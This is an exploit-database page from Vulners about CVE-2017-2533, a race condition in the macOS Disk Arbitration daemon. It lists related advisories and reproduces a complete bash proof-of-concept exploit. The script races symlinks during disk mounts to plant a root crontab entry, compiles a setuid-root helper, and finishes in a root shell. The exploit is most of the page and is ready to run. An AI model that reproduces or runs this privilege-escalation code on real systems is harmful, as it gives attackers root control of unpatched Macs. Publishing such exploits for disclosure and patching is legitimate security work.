Vulners
Lucene search
Apple MacOS Disk Arbitration Daemon Race Condition
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Apple macOS - Disk Arbitration Daemon Race Condition Exploit | 10 Jun 201700:00 | – | zdt |
 | Mac OS X 10.x < 10.12.5 Multiple Vulnerabilities | 17 May 201700:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Update 2017-002) | 18 May 201700:00 | – | nessus |
| macOS 10.12.x < 10.12.5 Multiple Vulnerabilities | 18 May 201700:00 | – | nessus |
 | About the security content of macOS Sierra 10.12.5, Security Update 2017-002 El Capitan, and Security Update 2017-002 Yosemite | 15 May 201700:00 | – | apple |
| About the security content of macOS Sierra 10.12.5, Security Update 2017-002 El Capitan, and Security Update 2017-002 Yosemite - Apple Support | 8 Jun 201709:43 | – | apple |
 | CVE-2017-2533 | 9 Jun 201700:00 | – | circl |
 | Apple macOS Sierra DiskArbitration Competitive Conditional Elevation of Privilege Vulnerability | 23 May 201700:00 | – | cnvd |
 | CVE-2017-2533 | 22 May 201704:54 | – | cve |
 | CVE-2017-2533 | 22 May 201704:54 | – | cvelist |
10
`#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
if ! security authorize system.volume.internal.mount &>/dev/null; then
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
exit 1
fi
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
assert(argc == 2);
setuid(0);
setgid(0);
system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
race_link() {
mkdir -p mounts
while true; do
ln -snf mounts link
ln -snf $TARGET link
done
}
race_mount() {
while ! df -h | grep $TARGET >/dev/null; do
while df -h | grep $DISK >/dev/null; do
diskutil umount $DISK &>/dev/null
done
while ! df -h | grep $DISK >/dev/null; do
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
done
done
}
cleanup() {
echo "Killing child process $PID and cleaning up tmp dir"
kill -9 $PID
rm -rf $TMPDIR
}
if df -h | grep $DISK >/dev/null; then
echo 2>&1 "$DISK already mounted. Exiting."
exit 1
fi
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
while ! [ -e $TMPDIR/boom ]; do
sleep 1
done
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2017 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.0231